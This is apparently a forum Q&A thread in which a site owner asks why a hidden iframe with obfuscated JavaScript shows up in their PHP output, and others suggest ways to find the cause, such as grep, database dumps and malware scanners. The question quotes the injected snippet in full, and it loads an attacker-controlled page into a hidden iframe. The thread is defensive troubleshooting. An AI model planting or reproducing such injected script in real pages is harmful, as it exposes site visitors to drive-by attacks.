# Help with odd PHP javascript/hidden iframe hack

Tags: php, javascript, apache, iframe

Some pages on my site are including an unintended hidden iframe with some javascript in their output.  I have read about sites getting hacked and similar code being added to php and html files before, but that is not quite the problem here, as none of my files actually contain the content that ends up in the output.  I have no idea how this is happening.  **Is there some global php code that executes with each page load, or could it be at apache level?**  I'm at a loss.

Here is an example of what I'm seeing in the output:

```
<div style="display: block;overflow:hidden;width:0;height:0;left:0px;position:absolute;top:0px"><img id="7867" height="1" width="1"><img src="about:blank" onError='bvnnho=unescape("%27");fyvdmn=eval("document.getElementById("+bvnnho+"npelmp"+bvnnho+").src=unescape("+bvnnho+"%68%74%74%70%3A%2F%2F"+bvnnho+")+document.getElementById("+bvnnho+"7867"+bvnnho+").id+unescape("+bvnnho+"%2E%69%6E%2F"+bvnnho+")+"+bvnnho+"1299250012"+bvnnho+"+unescape("+bvnnho+"%2E%70%68%70"+bvnnho+")");document.getElementById("npelmp").src=fyvdmn' style="width:300;height:300;border:0px;"><iframe id="npelmp" src="about:blank"></iframe></div>
```

I have gone over my script very carefully and do not see how it could be outputting this.  The reason I noticed it is that my script is used for writing a csv file, and an iframe--even hidden--sticks out like a sore-thumb in a csv file.  My web host says they haven't gotten any complaints from other users, so it must be my problem.

I have checked all my code (by hand and compared to my local copy), and I went through my database (which only contains integers anyway).  I have found no sign of where this is coming from.

Oh, the other bit that makes this so hard to track down is that it is not present every time.  So when I try to show the host support, it wasn't there.

Has anyone seen this before.  Or any idea of where else I can look?

Thanks...

Comment: Turn off JS in your browser and refresh the page, if it's still appearing it's not coming from javascript. So must be in the PHP, and vice versa, then you'll need to look at tracing through whichever bit of code is causing it to appear.

Comment: You probably *did* get hacked. The script is a bit crude, but when evaluated it loads an iframe that points to `http://7867.in/1299250012.php`.  Firefox tells me it's an reported attack page.

Comment: @david-gillen Yes, I realize it is not purely generated from javascript--I just meant to say that the oddity included javascript.  I am viewing the raw output coming from the server as plaintext and I'm seeing exactly what I pasted above--I just cannot find it anywhere in my php (or elsewhere) so that I can clean it out!  That is why I'm wondering if somehow it is getting inserted on the way out by apache.

Answer (score 0):

If you have ssh access, you may just run

```
grep iframe ./ -Ri
```

(hint, hackers usually use hidden directories, named " " or stuff like that, that's probably why don't find it)

If it fails, try to search the db, either with phpmyadmin or dumping the raw content to a file and grepping it the usual manner

```
mysqldump -uUSERID -pPASSWORD DATABASENAME > mydump.sql
grep iframe mydump -i
```

Comment: Thanks for your response. Unfortunately, I do not have ssh access. My cPanel has a backup option that will give me a zip of everything, though--so I will try and grep it after extracting locally.  I just don't understand how this could be happening while the iframe is CLEARLY not in the PHP file that appears to be generating it... there are no includes or anything, it's pretty simple code.  This is what is leading me to question whether it is being tacked on from a rogue Apache module or something.

Comment: Also, I forgot to mention before, but my database is just a sqlite file.  I downloaded it locally and went through it and--as expected--it only contained integers like it is supposed to.  Let me know if you have any other ideas... thanks!

Comment: Many times hackers include an hidden php file. That php file contains nothing but the instruction to load php code from a remote host and then executes it. So setting off ALLOW_URL_FOPEN and ALLOW_URL_INCLUDE prevents hackers scripts from working. I suggest you to try to GREP your source folder looking for "http". Also don't look manually, use an automated tool, since you want to be able to spot hidden files you may have overlooked. Also check the content of .htaccess.

Answer (score 0):

This is quite common.

Search all files for a string that looks like:

`<?php eval(base64_decode("ZnVuY3Rpb24g...`

This code might be in header.php file or some other .php file.

Please post back here with what you find.

Comment: Unfortunately, I'm still not finding anything. My script has NO includes (no header or anything--I'm only outputting comma/colon separated numbers), NO eval.... nothing out of the ordinary.  So unless there is some way that another script is executing (without, as a said, an explicit include in my requested script), then I am at a loss for where this is coming from.

Answer (score 0):

I realize this is an old post but for readers with same/similar probs try scan your site with 
http://sitecheck.sucuri.net/scanner/

Or use the following script. http://www.php-beginners.com/solve-wordpress-malware-script-attack-fix.html (although it is word wordpress it also works on other websites)

Good Luck!